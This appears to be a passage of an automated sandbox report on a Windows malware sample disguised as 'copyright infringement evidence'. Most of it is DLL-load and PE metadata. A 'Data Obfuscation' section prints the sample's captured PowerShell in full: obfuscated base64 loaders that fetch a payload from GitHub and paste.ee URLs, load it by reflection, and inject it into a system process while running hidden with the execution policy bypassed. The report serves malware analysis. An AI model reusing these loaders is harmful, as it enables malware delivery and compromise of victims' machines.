Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttpcom.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: copyright_infringement_evidence_1.exe Static PE information: certificate valid
Source: copyright_infringement_evidence_1.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: copyright_infringement_evidence_1.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: copyright_infringement_evidence_1.exe Static file information: File size 2215688 > 1048576
Source: copyright_infringement_evidence_1.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x158800
Source: copyright_infringement_evidence_1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: copyright_infringement_evidence_1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: copyright_infringement_evidence_1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: copyright_infringement_evidence_1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: copyright_infringement_evidence_1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: copyright_infringement_evidence_1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: copyright_infringement_evidence_1.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: copyright_infringement_evidence_1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb{ source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb A source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ib.pdb%~ source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000023.00000002.2517360363.0000020827DD5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2526910009.0000020828190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3054808886.0000021055D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3054808886.0000021055D65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: btem.pdb source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bpdbtem.pdbn source: powershell.exe, 00000023.00000002.2517360363.0000020827D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000034.00000002.3054808886.0000021055D65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb2[0 source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb-d source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb}i source: powershell.exe, 00000023.00000002.2517360363.0000020827DD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: re.pdb source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: copyright_infringement_evidence_1.pdb source: copyright_infringement_evidence_1.exe, copyright_infringement_evidence_1.exe, 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000000.2054790226.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Are source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Core.pdb/ source: powershell.exe, 00000023.00000002.2517360363.0000020827D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2522177063.000001EF69D90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbm source: powershell.exe, 00000023.00000002.2530199536.0000020828219000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *e.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000023.00000002.2349006355.000002080DEC9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdb source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC source: powershell.exe, 00000024.00000002.2530773405.000001EF69FC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000034.00000002.3072232839.000002105615A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: re.pdbZJK source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?ystem.Core.pdb=K source: powershell.exe, 00000034.00000002.2529930653.000002103BD5B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbLZ source: powershell.exe, 00000023.00000002.2526910009.00000208281C2000.00000004.00000020.00020000.00000000.sdmp
Source: copyright_infringement_evidence_1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: copyright_infringement_evidence_1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: copyright_infringement_evidence_1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: copyright_infringement_evidence_1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: copyright_infringement_evidence_1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/KSAcF/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "rajado", "AddInProcess32", "desativado","")'; Invoke-Expression $command
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/KSAcF/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "rajado", "AddInProces
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/zbEuc/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "tondinho", "AppLaunch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/KSAcF/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "rajado", "AddInProcess32", "desativado","")'; Invoke-Expression $command
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); $command = '[dnlib.IO.Home]::VAI("0/KSAcF/d/ee.etsap//:sptth", "1", "C:\ProgramData\", "rajado", "AddInProces
